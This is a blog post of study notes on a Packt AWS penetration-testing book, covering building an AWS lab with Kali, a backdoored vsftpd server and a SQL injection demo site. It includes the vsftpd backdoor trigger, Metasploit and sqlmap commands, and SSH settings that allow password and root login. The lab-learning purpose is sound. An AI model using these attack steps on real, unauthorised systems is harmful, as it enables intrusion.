It’s book club time again! I want to do notes to kind of keep myself accountable, but I don’t have the time to devote to doing them “right.” So they will be fast, concise, and possibly convoluted. I’m going to focus on where I ran into issues, but hopefully write them like I was trying to walk someone through it. The notes may get shorter as we go along…
Book info – Hands-On AWS Penetration Testing with Kali Linux
It’s a Packt book, and I’ve found Packt is a publisher people have some strong opinions about. I’ve pulled a lot of their free offerings and picked up a cybersecurity Humble Bundle offer. My general impression is mostly good info, sometimes with less attention to detail than I would prefer. I wouldn’t discourage people from getting Packt books, and I’ve gotten a lot of value out of what I have. Just not always the best copy editing. To be fair, these tend to be highly technical books that are a bear to edit, and because of the nature of technology, it’s just about impossible to get a book to press before the instructions become somewhat obsolete. So be aware that you may have to do some digging to get things to work.
And that’s really why I want to do the quick notes. Because, for instance, tomcat is no longer included in the Kali packages, so you can’t apt-get it. Not a big deal, but it makes setting up tomcat a different process.
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
Ch 1 – Setting Up a Pentesting Lab on AWS
I’ve done a bit with AWS. It’s what I used for my pentesting environment for The Hacker Playbook 3, but I haven’t used it in a while. Setting up an account takes some time and will require a credit card. I recommend adding 2-factor authentication…but like Frank’s Red Hot, I put that stuff on everything. AWS has some free training available. I plan to do a little of it as I work through this book, but it won’t be a focus.
Setup was pretty straightforward. I generally pick a free tier and go from there. I used the free tier for my Kali box while I was doing light stuff and pushed it up to the recommended t2.medium level when I started using it. It’s a small price increase, but the time saved is worth it to me.
Ubuntu EC2 Instance
As of early 2020, you could still find an Ubuntu 16.04 LTS instance to load. These should stick around a bit since they are EOL in 2024. Keep in mind the console changes frequently, so the screenshots may not match exactly. I’ve found both AWS and Azure to usually keep things similar to older versions and relatively intuitive to navigate. It can take a minute to get oriented though.
Note: I think the Kali set-up is more detailed, so if you are really new to AWS, might want to jump ahead to that section to start.
Use the defaults, pick a region (usually pick what’s closest) – you need to keep all the instances for your lab in the same region. And note the VPC and subnet so you can use those for the other instances as well. AWS will walk you through accessing the system, but the SSH setup can be a little daunting if you haven’t done much with it. I like to use Windows Subsystem for Linux (WSL) and/or Putty depending on what I’m doing. The SSH setup is easier using Linux or WSL because the key permissions are easier to adjust. If you are using WSL, make sure you copy the key file over to your WSL file structure so you can adjust the permissions. For Putty, you’ll have to make a special Putty key file. AWS has some really good documentation, and there will be walkthroughs as you are setting things up.
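The key-permission step is the usual stumbling block, so here’s a minimal sketch of it. The file name `pentest-lab.pem` is a stand-in for whatever you named the key pair you downloaded from AWS (the `touch` is only there so the snippet stands alone — you’d run the `chmod` against your real key):

```shell
# Stand-in for the key file downloaded from AWS (hypothetical name)
touch pentest-lab.pem
# ssh refuses keys that are group/world readable; make it owner read-only
chmod 400 pentest-lab.pem
# Verify (GNU stat, i.e. Linux/WSL) — prints 400
stat -c '%a' pentest-lab.pem
```

For Putty, you’d instead feed the .pem to PuTTYgen to produce the .ppk key file it expects.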
Connect, run your upgrades, and wait for them to complete. I’ve been using the public DNS rather than the IP because…well, because. I think that’s what AWS suggests. For Ubuntu, you’ll be connecting as the ubuntu user:

```shell
ssh -i <pem file> ubuntu@<Public DNS or IP>
sudo apt-get update && sudo apt-get dist-upgrade
```
Install a backdoored version of vsftpd and get that set up so you have a vulnerable service. Info about this version is hosted on Nik Dubois’ GitHub, and there’s some good background info there too. I followed the setup as in the book with no problems. It’s a good instance to start with because it was pretty straightforward and there wasn’t much room for things to go haywire.
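For context on why this service is "vulnerable": the well-known vsftpd 2.3.4 backdoor fires when the FTP username contains the string `:)`, after which a shell listens on TCP 6200. The host IP below is a placeholder; the executable part of the sketch just demonstrates the trigger condition itself:

```shell
# Poking the backdoor by hand from the Kali box (IP is a placeholder):
#   nc <ubuntu_private_ip> 21    -> USER whatever:)  -> PASS anything
#   nc <ubuntu_private_ip> 6200  -> shell, if the backdoor fired
# The trigger is just a substring check on the username:
USERNAME='whatever:)'
case "$USERNAME" in
  *':)'*) echo "trigger string present" ;;
  *)      echo "no trigger" ;;
esac
```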
The Windows instance is also fairly straightforward, but (thankfully) there is no 2003 image available. Kind of super ok with that. The next “best” option is a 2008 image. I opted for the CIS Microsoft Windows Server 2008 R2 Level 1 benchmark image. There are other options – I went with CIS because I didn’t want to take the time to look into who made the other images, and the cost was in line with the other images. From a build-out perspective, it’s great knowing pre-hardened images are on there. So if you are using CIS benchmarks, you can maintain that practice moving into AWS.
Starting the instance is about the same. Be sure to verify your region, VPC, and subnet settings match. You will use your existing key-pair to set up access. Since SSH isn’t an option, you have to set up RDP (which is part of why I wanted to use at least a somewhat hardened image – because RDP and Internet exposure make me nervous). Basically, right click on the instance, pick Get Windows Password and follow the directions. Make sure you take note of the password – you’ll be up a creek without it. Then RDP in as normal using either IP or DNS (I again prefer the DNS). Install Firefox and then on to XAMPP. I installed the current version of XAMPP since I’m on a 2008 box.
Clear the hosting folder (note – this is C:\xampp, not that anyone would ever be in a hurry and overlook that), then drop in the SQL injection demo (ShinDarth is now FrancescoBorzi – be cautious about blindly following download links; GitHub accounts change, as we learned working with Slurp in THP3, which ironically deals with AWS S3 buckets). Don’t overlook creating a database and importing the data. Then verify you have a functioning SQL Injection Demonstration Project site on your localhost.
Configuring Security Groups
The default in AWS is to not allow communication between EC2 instances. I prefer this setup, but it means some work to get your lab boxes talking to each other. Basically, grab the private IP of the Ubuntu instance and add an inbound rule to the Windows box’s Security Group allowing all traffic from the Ubuntu box. (The book gets confused and refers to the Kali box instead of the Ubuntu one for a big chunk of this section – it’s easy to see what is meant, but it’s an example of the editing/attention-to-detail thing.) Then curl the webpage hosted on your Windows box to verify.
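If you’d rather script the rule than click through the console, the same inbound rule can be added with the AWS CLI. The security-group ID and private IP below are hypothetical placeholders, and the block only builds and prints the command rather than calling AWS:

```shell
# Hypothetical IDs — substitute your Windows box's security group and
# the Ubuntu instance's private IP. Printed, not executed.
SG_ID="sg-0123456789abcdef0"
UBUNTU_IP="172.31.20.15"
cat <<EOF
aws ec2 authorize-security-group-ingress \\
  --group-id ${SG_ID} \\
  --protocol=-1 \\
  --cidr ${UBUNTU_IP}/32
EOF
```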
```shell
curl -vL <Private_IP_of_Windows_Instance>
```
If you don’t get anything, double check your AWS Security Group for the Windows box. If that’s correct, check your Windows instance for a firewall. The CIS image I used had the firewall enabled and managed via group policy. I just added rules in the Windows firewall (from Server Manager) to allow inbound traffic from the other instances. For good measure, I added outbound rules as well. That shouldn’t be necessary, but since it’s at least a somewhat hardened image, I’d rather add the rule and have it done than find out later there’s some weird thing there.
I also restricted the inbound rules for all hosts to the IPs I’ll use to connect to them. Call me paranoid, but I’d rather adjust the AWS Security Group as needed than leave RDP on a Windows 2008 R2 box exposed to the wild. Even if I don’t leave the instance running all the time.
Ch 2 – Setting Up a Kali PentestBox on the Cloud
There’s a Kali AMI (Amazon Machine Image) available. Bear in mind Kali had some pretty big changes with the end-of-2019 releases (2019.3 and 2019.4) and the first 2020 release, so be prepared for some mental gymnastics if you’ve used older versions of Kali much. I get a huge kick out of Kali-Undercover, but it’s taking some time to get a fresh 2020.1 install set up the way I like. (Sigh.)
Spinning up the instance is straightforward. Make sure it’s using the latest Kali build. Check the region, VPC, and subnet to make sure they match. Use the key pair previously created. And voila.
I started with a micro instance to run updates and what not. Mostly just to see what it would handle. I’ve bumped that up to the recommended t2.medium because the demands on the instance were testing my patience with the t2.micro resources.
Set up the Security Group to allow traffic to your other instances, SSH, and Guacamole. Again, call me paranoid but I restricted the source on these to where I’d be using them.
Kali gets set up for password access after you SSH in using your keys. The basic account is ec2-user, and it has sudo privileges. First up, change the passwords:

```shell
# Change root password
sudo passwd
# Change user password
sudo passwd <user>
sudo passwd ec2-user
```
Then edit the /etc/ssh/sshd_config file to allow PasswordAuthentication and PermitRootLogin (if desired). Restart the ssh service, and done. That’s just CLI though, so that’s where Guacamole comes in. And this is where things got wonky.
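For reference, the two directives in question look like this once changed (a fragment of /etc/ssh/sshd_config, not the whole file):

```
# /etc/ssh/sshd_config (fragment)
PasswordAuthentication yes
PermitRootLogin yes        # only if you actually want root login over SSH

# then restart ssh to pick up the change:
#   sudo systemctl restart ssh
```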
Tomcat & Guacamole
Setting up the ufw firewall was typical; more info about that is in the Ubuntu docs. When installing the prerequisites for Guacamole, remember that there aren’t hyphens between the lib and whatever comes next. And exclude tomcat8, because you can’t install it with apt anymore. To install tomcat, you need to just download it. I’m in the habit of installing stuff to /opt/ to help me keep track of the tools I use, so that’s where I installed it. The Digital Ocean guide for 16.04 is pretty good, except the systemd script did not work, and trying to fix it resulted in chasing a whole lot of rabbits. What it came down to is that the way tomcat is designed apparently doesn’t work so hot with the current version of systemd. Upside: I learned a lot about tomcat and how systemd functions. Downside: it opened a serious can of worms. Because I’m a somewhat stubborn person, I was determined to get the systemd script working. There were issues with finding java in the script from Digital Ocean’s guide, and I’m not confident in the security of what I ended up with. It works, but I would not trust it in production.
For the path of least resistance (and the one I would actually recommend), follow the symbolic link directions from kodmanyagha in this post on superuser and use:

```shell
chmod +x /opt/tomcat8/bin/*.sh
ln -s /opt/tomcat8/bin/startup.sh /usr/bin/tomcatstart
ln -s /opt/tomcat8/bin/shutdown.sh /usr/bin/tomcatshutdown
```
I did a lot of digging and finally ended up using 750 for my directory permissions and 520 for the files in the tomcat directory. My startup script ended up looking like oers’ comment on the gist.
```ini
[Unit]
Description=Start Tomcat
After=network.target

[Service]
Type=forking
WorkingDirectory=/opt/tomcat8
User=tomcat
Environment=JRE_HOME=/usr
Environment=JAVA_HOME=/usr
Environment=CATALINA_HOME=/opt/tomcat8
Environment=CATALINA_BASE=/opt/tomcat8
ExecStart=/opt/tomcat8/bin/startup.sh
ExecStop=/opt/tomcat8/bin/shutdown.sh
SyslogIdentifier=tomcat-%i

[Install]
WantedBy=multi-user.target
```
One more gotcha: the server.xml file was in ./tomcat8/conf, not the top-level tomcat8 directory.
Once I dealt with the tomcat issue, the rest was fairly straightforward. Download the Guacamole files, extract, move to the guacamole-server directory, install. Configure for SSH and RDP. The /etc/guacamole directory and files are not automatically created, so you have to create those manually. I did a lot of the troubleshooting for this by setting up a local Kali VM. A couple of odd things I noticed there: I had to enable the ssh service (makes sense – I suspect the AMI kind of has to have that enabled, but it wouldn’t be by default), and you can’t RDP into a box using Guacamole when you are logged on locally. I’m also not sure what changed, but I had to set up my network adapters to both come up – something I’ve never had to do with a Kali VM in the past. If you run into this issue, this walkthrough should get you up and running: basically, edit /etc/network/interfaces to include the adapters and set them to auto.
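For reference, the resulting file looked something like this. The interface names are assumptions – use whatever `ip a` actually shows on your VM:

```
# /etc/network/interfaces (fragment) — bring both adapters up at boot
auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet dhcp
```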
Guacamole is running over HTTP, so you really need to be cautious about how you leave this box exposed. I choose to set up a tunnel (covered in the next section).
Ch 3 – Exploitation on the Cloud Using Kali Linux
This chapter is a great intro to exploitation, and it’s something most people should be able to handle without much frustration.
Configuring and Running Nessus
This part was straightforward. Download Nessus and transfer it to Kali – I just used WSL. The book covers using WinSCP, which looks interesting, but that’s not a rabbit I want to chase at the moment. It looks fairly easy to use, so I may set it up if I need to transfer more files in the future. Once the file is there, dpkg it and start the service. I put mine in /opt/nessus by moving the file and running dpkg from that folder.
Setting up the tunnel was straightforward. I decided to set it up in Putty so I could easily put in tunnels for both Nessus and Guacamole – Putty > Connection > SSH > Tunnels, then add 8834 and 55555. You should be able to do the same with ssh:

```shell
ssh -L 8834:127.0.0.1:8834 -L 55555:127.0.0.1:55555 ec2-user@<instanceIPorDNS>
```
Setting up Nessus runs, well, like setting up Nessus. Access the webpage, request a code, get the code from email, enter the code, create an account, then wait and wait and wait while it compiles the plugins.
Then run the scan. The scan done for the book is a complex one, so expect to wait for 20 minutes or so.
Exploiting a Vulnerable Linux VM
Review the results and notice it’s all at the informational level. The vsftpd server has a backdoor, but apparently that doesn’t qualify as critical (insert sarcasm as needed). Read over the rest of the info – the more you look at information like this, the easier it is to spot potential vulnerabilities.
For this one, it’s a Metasploit module, and it runs completely as expected.
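For the record, the Metasploit module for this backdoor is exploit/unix/ftp/vsftpd_234_backdoor. A minimal msfconsole session looks about like this – the RHOSTS value is a placeholder for your Ubuntu instance’s private IP (older Metasploit versions use RHOST instead):

```
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > set RHOSTS <ubuntu_private_ip>
msf > run
```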
Exploiting a Vulnerable Windows VM
These results are going to be different from the book’s since I’m running a 2008 instance instead of 2003. For this exercise it doesn’t matter, since the website is the target. It’s easy to go through the commands using sqlmap, but if you aren’t familiar with the tool, do some background reading. I’ve used it a little, but I’ve only scratched the surface of what it can do.
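As a starting point, the general shape of a sqlmap run looks like this. The URL and parameter are assumptions – point it at whatever page of the SQLi demo actually takes user input. To keep the sketch harmless, the block only builds and prints the command:

```shell
# Placeholder target — substitute your Windows instance's private IP
# and the demo page/parameter you are actually testing.
TARGET="http://172.31.20.20/index.php?id=1"
# --batch answers sqlmap's prompts with defaults; --dbs enumerates databases
SQLMAP_CMD="sqlmap -u \"${TARGET}\" --batch --dbs"
echo "$SQLMAP_CMD"
```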
That wraps section 1. Other than fighting with tomcat and adjusting the Windows firewall, it was pretty smooth. My lab costs were less than $2.00 (US) after finishing this section. The next section goes more in-depth with EC2 instances, so I’m looking forward to learning more about the AWS environment.